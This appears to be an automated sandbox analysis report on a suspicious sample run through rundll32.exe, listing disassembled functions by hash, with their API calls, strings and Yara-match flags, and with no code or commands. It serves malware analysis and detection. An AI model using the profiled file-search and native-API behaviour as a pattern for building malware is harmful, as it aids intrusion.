Instruction ID: 84e3f341923d72ff255c787ffe564c375197f373989da742f01be61ed1e3e416
Opcode Fuzzy Hash: 61d22d30e81df562d6639c28a4106e546f06862c74f2bc7f2b843b922fe72db0
Instruction Fuzzy Hash: A0812871D00269DBDB22CF54CC45BDEB6B8AF49710F0446EAE909B7280E7709E85CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 1E8E237A, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111COMMON

Download Yara Rule

Strings

LdrpDynamicShimModule, xrefs: 1E92A7A5
Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 1E92A79F
apphelp.dll, xrefs: 1E8E2382
minkernel\ntdll\ldrinit.c, xrefs: 1E92A7AF

Memory Dump Source

Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true

Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-176724104
Opcode ID: 825ac499b713df924ee7bb5164bc2f96dfeda84ef63275f78e28710cf8c949d9
Instruction ID: 13fae74ce00e7d5c2ff05a9583d61acce71295cf76952ec7148fd4ca9b776ad3
Opcode Fuzzy Hash: 825ac499b713df924ee7bb5164bc2f96dfeda84ef63275f78e28710cf8c949d9
Instruction Fuzzy Hash: B7310376A04262AFDB11DF59CCC0E9A77BAEF84B00F54026DE901A7254E7B4A841CF90

Uniqueness

Uniqueness Score: -1.00%

Function 1E8BF8B0, Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 263timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E91E51F

Strings

HEAP[%wZ]: , xrefs: 1E91E490
(HeapHandle != NULL), xrefs: 1E91E4A8
HEAP: , xrefs: 1E91E49D

Memory Dump Source

Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true

Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd

Similarity

API ID: DebugPrintTimes
String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
API String ID: 3446177414-3610490719
Opcode ID: 942d885e107c6ce1d324745285cf739df5b6685245a3f118729fb3b8515ec0a2
Instruction ID: 87a175cc9e8f33010d0dd0f92ec02eb556ae252826fa11810feb7746691c0611
Opcode Fuzzy Hash: 942d885e107c6ce1d324745285cf739df5b6685245a3f118729fb3b8515ec0a2
Instruction Fuzzy Hash: 55911335604785AFD716CB28CC90B2EB7AABF84A50F040B5DF8419B381DB35F884CB92

Uniqueness

Uniqueness Score: -1.00%

Function 1E8E9723, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 179timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E8E9922

Strings

LdrpUnloadNode, xrefs: 1E92DAF5
Unmapping DLL "%wZ", xrefs: 1E92DAEE
minkernel\ntdll\ldrsnap.c, xrefs: 1E92DAFF

Memory Dump Source

Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true

Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd

Similarity

API ID: DebugPrintTimes
String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
API String ID: 3446177414-2283098728
Opcode ID: fbb54ff90a3e16efed6e0ade52467faf13ec11d45946eba39ab5798dc220c36e
Instruction ID: 60c6ea6679ddd3133b78d1dd7bc2eaee47c8c09697b295680b760338016d52c9
Opcode Fuzzy Hash: fbb54ff90a3e16efed6e0ade52467faf13ec11d45946eba39ab5798dc220c36e
Instruction Fuzzy Hash: DE5103716147429BC710DF38CC84E5977A6BB86714F180BACE8519BAE5E7B0F848CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 1E8FC640, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E8FC6DF

Strings

Failed to reallocate the system dirs string !, xrefs: 1E9380E2
LdrpInitializePerUserWindowsDirectory, xrefs: 1E9380E9
minkernel\ntdll\ldrinit.c, xrefs: 1E9380F3

Memory Dump Source

Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true

Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-1783798831
Opcode ID: e187aaba01cbc4b174325e0cf9407c724c5129f322b939ca0a4c840b3637ce4d
Instruction ID: 0388dd32d00e05e6a5b382a9553eaad80e29dca975228c0a630b2cae9201977e
Opcode Fuzzy Hash: e187aaba01cbc4b174325e0cf9407c724c5129f322b939ca0a4c840b3637ce4d
Instruction Fuzzy Hash: 2941B1B5518390EBC721DB68CD80F5B77E9AF84A10F104F2EF94897291EB34E900CB95

Uniqueness

Uniqueness Score: -1.00%

Function 1E9443D5, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E944489

Strings

LdrpCheckRedirection, xrefs: 1E94450F
minkernel\ntdll\ldrredirect.c, xrefs: 1E944519
Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 1E944508

Memory Dump Source

Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true

Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 3446177414-3154609507
Opcode ID: ee8a75867bba5e1f905891e56a1c4d15f1eb1435e9564c1b66c1aefa4d8347e1
Instruction ID: cb49536a4e95107583b63bee845b03f7374309452e4aecbe7b72967842393a00
Opcode Fuzzy Hash: ee8a75867bba5e1f905891e56a1c4d15f1eb1435e9564c1b66c1aefa4d8347e1
Instruction Fuzzy Hash: 2541E1326047699BCB12CF69CA90A1677EBBF88650B260B5DEC88D7355D730E800CF81

Uniqueness

Uniqueness Score: -1.00%

Function 1E945B90, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E945C0F
RtlDebugPrintTimes.NTDLL ref: 1E945C31
RtlDebugPrintTimes.NTDLL ref: 1E945C3E

Strings

Wow64 Emulation Layer, xrefs: 1E945C09

Memory Dump Source

Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true

Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Wow64 Emulation Layer
API String ID: 3446177414-921169906
Opcode ID: 80de4a97739f2484adf3074cc3cd91f7b735f6d14d38c9fb68d12e8e16b0b3d1
Instruction ID: 0d5a2f290dba6f8fd72c542d5eb8f98e094f51888d0077dfa1eda0477a243221
Opcode Fuzzy Hash: 80de4a97739f2484adf3074cc3cd91f7b735f6d14d38c9fb68d12e8e16b0b3d1
Instruction Fuzzy Hash: 75213A7690015DBFEB019BA4CD84EFF7B7DFF85299B150658FA01A2240E730AE01EB60

Uniqueness

Uniqueness Score: -1.00%

Function 1E93EBD0, Relevance: 6.2, APIs: 4, Instructions: 187timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E93EC61
RtlDebugPrintTimes.NTDLL ref: 1E93EC89
RtlDebugPrintTimes.NTDLL ref: 1E93ED2C
RtlDebugPrintTimes.NTDLL ref: 1E93EDE0

Memory Dump Source

Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true

Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 5699a821849a518bd4c5ac5a141afac7759694e62a4fe31cb1eb6e23cb811875
Instruction ID: ecf379925c2d8bbd054252fc64a80b780be99ea32ed05ff6f1e98e14a5fd1ad0
Opcode Fuzzy Hash: 5699a821849a518bd4c5ac5a141afac7759694e62a4fe31cb1eb6e23cb811875
Instruction Fuzzy Hash: F4710075E003299BDF05CFA4C884AEDBBB9FF48312F25462AE915BB250D734A942CF54

Uniqueness

Uniqueness Score: -1.00%

Function 1E99A04A, Relevance: 6.2, APIs: 4, Instructions: 170timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E99A0F7
RtlDebugPrintTimes.NTDLL ref: 1E99A1AA
RtlDebugPrintTimes.NTDLL ref: 1E99A1CE
RtlDebugPrintTimes.NTDLL ref: 1E99A1E3

Memory Dump Source

Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true

Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 54154252bf52e41bf6d88b6ea0a573df18c415345194a1846402713ef6902e56
Instruction ID: 1b6acf69b4c4fee97823acf64efce82af7c724fce4dc0bd8a5c09ab94687c34b
Opcode Fuzzy Hash: 54154252bf52e41bf6d88b6ea0a573df18c415345194a1846402713ef6902e56
Instruction Fuzzy Hash: 1651AE70714A129FDF19CE19C8A4A19B7EAFF8A310B144A6DD906C7710DBB9EC41EF80

Uniqueness

Uniqueness Score: -1.00%

Function 1E93EE56, Relevance: 6.2, APIs: 4, Instructions: 150timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E93EEED
RtlDebugPrintTimes.NTDLL ref: 1E93EF12
RtlDebugPrintTimes.NTDLL ref: 1E93EFA4
RtlDebugPrintTimes.NTDLL ref: 1E93EFF8

Memory Dump Source

Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true

Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 85e48f133c7c73cce640c7375a8fbe8f1e17fb272cdc43d9bbe5fac9eb2c0cbc
Instruction ID: 1712288a95c9f0160e8aa910c52c08dbf378099cf8d748ca90844fa87a0eda48
Opcode Fuzzy Hash: 85e48f133c7c73cce640c7375a8fbe8f1e17fb272cdc43d9bbe5fac9eb2c0cbc
Instruction Fuzzy Hash: B35113B6E102199FDF05CFA9C840ADDBBB6BF88312F25822AE815BB250D7749941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 1E8F7A4F, Relevance: 6.1, APIs: 4, Instructions: 81timethreadCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E8F7A72
BaseThreadInitThunk.KERNEL32 ref: 1E8F7A7C
RtlDebugPrintTimes.NTDLL ref: 1E9347F8
RtlDebugPrintTimes.NTDLL ref: 1E93487B

Memory Dump Source

Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true

Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd

Similarity

API ID: DebugPrintTimes$BaseInitThreadThunk
String ID:
API String ID: 4281723722-0
Opcode ID: 53b28c203899367e33ba501aaa33a0ca48237329c105ab2aa7d555e55e638378
Instruction ID: e62d68bab54821bcdf1c9c70c121d1699445c38f175ce58d1a6e84eccf5ac810
Opcode Fuzzy Hash: 53b28c203899367e33ba501aaa33a0ca48237329c105ab2aa7d555e55e638378
Instruction Fuzzy Hash: 77311479E142689FCF15DFA8D884ADEBBB1EF88320F11462AE511B7390CB346900CF90

Uniqueness

Uniqueness Score: -1.00%

Function 1E8C58E0, Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON

Download Yara Rule

Strings

@, xrefs: 1E9208AE

Memory Dump Source

Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true

Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: c0c194d461bf430f7a8a3bb11c876357ecc3d034afd0c9523add841bbca596d6
Instruction ID: 287f899e90f4b0e075df5c3e12d315542e54bc9a59e7f3d207cead7cd79db2f5
Opcode Fuzzy Hash: c0c194d461bf430f7a8a3bb11c876357ecc3d034afd0c9523add841bbca596d6
Instruction Fuzzy Hash: 033256749102AACFDF21CF65C844BDDBBB5BF0A304F0046E9D549A7281D7B4AA84DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 1E8F4B79, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON

Download Yara Rule

Strings

0, xrefs: 1E8F4BE3
Flst, xrefs: 1E8F4BB6

Memory Dump Source

Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true

Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd

Similarity

API ID:
String ID: 0$Flst
API String ID: 0-758220159
Opcode ID: fb2d4a851de30687d746e0a0707db538ddd07ebbe07baed547509c971ff8eda0
Instruction ID: 2ed55afcf05d71a72bfa234d207a69e8f67ae43f8525c6c5a0aa1ec3f5978777
Opcode Fuzzy Hash: fb2d4a851de30687d746e0a0707db538ddd07ebbe07baed547509c971ff8eda0
Instruction Fuzzy Hash: E35199B1A10289CFDB25CFA9C48475DFBFAEF44715F24C62ED0499B284E7B09985CB80

Uniqueness

Uniqueness Score: -1.00%

Function 1E8C0485, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E8C05D6

Strings

kLsE, xrefs: 1E8C05FE
TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 1E8C0586

Memory Dump Source

Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true

Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd

Similarity

API ID: DebugPrintTimes
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 3446177414-2547482624
Opcode ID: ff2ca9299c866754b7f0c7d7cdd771006c01136ac015f7fb09ca798f47a9b52a
Instruction ID: 1f1aa9d0270efbbee3ec5c9fac2fd8a2785345b7048f56c4b045b6fd372623e7
Opcode Fuzzy Hash: ff2ca9299c866754b7f0c7d7cdd771006c01136ac015f7fb09ca798f47a9b52a
Instruction Fuzzy Hash: FE519DB1A1078ADFDB10DFA9C440AEBB7F9AF46344F004A2ED59597240E734E546CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 1E8BDF21, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E8BDFE0

Strings

0, xrefs: 1E8BDFAB
0, xrefs: 1E8BDFC0

Memory Dump Source

Source File: 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, Offset: 1E890000, based on PE: true

Associated: 0000000A.00000002.47952118751.000000001E9B9000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1e890000_Zr26f1rL6r.jbxd

Similarity

API ID: DebugPrintTimes
String ID: 0$0
API String ID: 3446177414-203156872
Opcode ID: a75de55fbc2c8a7514321c32129be9981fbcbc238113e4ddf6034db07c27d653
Instruction ID: d95cbd86982e8d4db3afb45a490a5afa71a736ecdf184d5d9498a3ffa080c580
Opcode Fuzzy Hash: a75de55fbc2c8a7514321c32129be9981fbcbc238113e4ddf6034db07c27d653
Instruction Fuzzy Hash: 99415EB1608745AFC301CF29C444A5ABBE5BF89358F044A6EF588DB381D771E905CB96

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 4624 Parent PID: 4644 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	3%
Dynamic/Decrypted Code Coverage:	1.3%
Signature Coverage:	1%
Total number of Nodes:	1274
Total number of Limit Nodes:	148

Executed Functions

Function 0040FA89, Relevance: 4.6, APIs: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,00000000), ref: 0040FB5F
FindNextFileW.KERNELBASE(?,00000010), ref: 0040FB9E
FindClose.KERNEL32(?), ref: 0040FBA9

Memory Dump Source

Source File: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_rundll32.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: 6ee087180711228f804c369dc05dcf42940a756ace635dcca91050d0c6f1f568
Instruction ID: 0b798dc4eab1c55350c0cb67db25907102412528e9f03401b13478227c200f42
Opcode Fuzzy Hash: 6ee087180711228f804c369dc05dcf42940a756ace635dcca91050d0c6f1f568
Instruction Fuzzy Hash: EE319471900308BBDB20DF65CC85FEB777CAF44704F14456DB949A71C1D674AA848B95

Uniqueness

Uniqueness Score: -1.00%

Function 0040FA90, Relevance: 4.6, APIs: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,00000000), ref: 0040FB5F
FindNextFileW.KERNELBASE(?,00000010), ref: 0040FB9E
FindClose.KERNEL32(?), ref: 0040FBA9

Memory Dump Source

Source File: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_rundll32.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: 94ac2383ed33b1ff8722f515b1c9270529150a0752c82e9c8a819ec8a924b7c1
Instruction ID: 770f6d6fafb9d5f45b31999cc79e7e80c23310b70e2b12f41f36733285219747
Opcode Fuzzy Hash: 94ac2383ed33b1ff8722f515b1c9270529150a0752c82e9c8a819ec8a924b7c1
Instruction Fuzzy Hash: 7531A471900308BBDB30DF65CC85FEB777CAF84704F14446EB909A71C1D678AA888BA5

Uniqueness

Uniqueness Score: -1.00%

Function 004185E0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00413BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00413BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0041862D

Strings

.z`, xrefs: 0041861D, 00418628

Memory Dump Source

Source File: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: 36c6eae92b8005ba539885d914b12f5379157c135ee825ad128bd076db7cd32f
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: 24F0B2B2204208ABCB08CF89DC95EEB77ADAF8C754F158248FA0D97241C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00418690, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,1:A,FFFFFFFF,?,r=A,?,00000000), ref: 004186D5

Strings

1:A, xrefs: 004186AC, 004186B8

Memory Dump Source

Source File: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_rundll32.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: 1:A
API String ID: 2738559852-4271569354
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: 4a498055f1de8b016eb86f05d4d9e2f0ef691a8d0c1c9b5c2f62b7bf89d1b75c
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: D9F0F4B2200208ABCB04DF89CC80EEB77ADAF8C754F018248FA0D97241CA30E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0041868D, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 33filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,1:A,FFFFFFFF,?,r=A,?,00000000), ref: 004186D5

Strings

1:A, xrefs: 004186AC, 004186B8

Memory Dump Source

Source File: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_rundll32.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: 1:A
API String ID: 2738559852-4271569354
Opcode ID: 894451518b03425b5f96cb665bb015821518830248b6bef362a5c2ab4153df95
Instruction ID: 953023158cc98f1c8196bf5573ae22161c72cbad5555432729f78a93f1a2237a
Opcode Fuzzy Hash: 894451518b03425b5f96cb665bb015821518830248b6bef362a5c2ab4153df95
Instruction Fuzzy Hash: CCF017B6204049ABCB04DF99D890CEB77ADBF8C354B15828DFA1CA7201C630E855CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0041870A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 23nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(P=A,?,?,00413D50,00000000,FFFFFFFF), ref: 00418735

Strings

P=A, xrefs: 0041872C, 00418734

Memory Dump Source

Source File: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_rundll32.jbxd

Yara matches

Similarity

API ID: Close
String ID: P=A
API String ID: 3535843008-4174302746
Opcode ID: 018cb176b172d783d48d9f0d354cb53a4ba3811f890f0fcac36f657c00b585a6
Instruction ID: 525f99c71dfe225296bb4ca44611c08f383b6dbc49112883f63eb832c7279ea7
Opcode Fuzzy Hash: 018cb176b172d783d48d9f0d354cb53a4ba3811f890f0fcac36f657c00b585a6
Instruction Fuzzy Hash: 94E04631600214ABDB20DFA4CC86EEB7B6AEF44360F144159F909DB682C630E650CAD0

Uniqueness

Uniqueness Score: -1.00%

Function 00418710, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(P=A,?,?,00413D50,00000000,FFFFFFFF), ref: 00418735

Strings

P=A, xrefs: 0041872C, 00418734

Memory Dump Source

Source File: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_rundll32.jbxd

Yara matches

Similarity

API ID: Close
String ID: P=A
API String ID: 3535843008-4174302746
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: bce2094732f0dc6043ed148681cd5d29f2b757d64a263796670ac5fc8daf7d12
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: 27D01776200214BBE710EB99CC89EE77BACEF48760F154499FA189B242C930FA40C6E0

Uniqueness

Uniqueness Score: -1.00%

Function 004187C0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00402D11,00002000,00003000,00000004), ref: 004187F9

Memory Dump Source

Source File: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: 15e9253bdc6667238a85ff9da65bd6f3d3aad2e55959b4b07e7d113ae3ba9bea
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: 6CF015B2200209ABDB14DF89CC81EEB77ADAF88754F118149FE0897241C630F910CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004187C2, Relevance: 1.5, APIs: 1, Instructions: 29memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00402D11,00002000,00003000,00000004), ref: 004187F9

Memory Dump Source

Source File: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b7b15b99fa607431c14642596bc06a23face6b8274340ec77040ea26b9abdcb3
Instruction ID: f6e690475ae93a959fdc8485af364064d5dcee13894a993032aafcde413755c4
Opcode Fuzzy Hash: b7b15b99fa607431c14642596bc06a23face6b8274340ec77040ea26b9abdcb3
Instruction Fuzzy Hash: 42F015B2200109AFDB14DF89CC80EEB77A9AF88354F118249FA0897241C630E911CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 043A34E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 043A34EA

Memory Dump Source

Source File: 0000000F.00000002.51925522665.0000000004330000.00000040.00000001.sdmp, Offset: 04330000, based on PE: true

Associated: 0000000F.00000002.51926871418.0000000004459000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.51926935310.000000000445D000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_4330000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c7cea9bf9d13d13d40e276952908a61dccacdb37d31b8f7d03de8831793b13e5
Instruction ID: eeb5e1e240dedd339afb36159c138cda536267c82482f5aa3a6d6576b836ee0b
Opcode Fuzzy Hash: c7cea9bf9d13d13d40e276952908a61dccacdb37d31b8f7d03de8831793b13e5
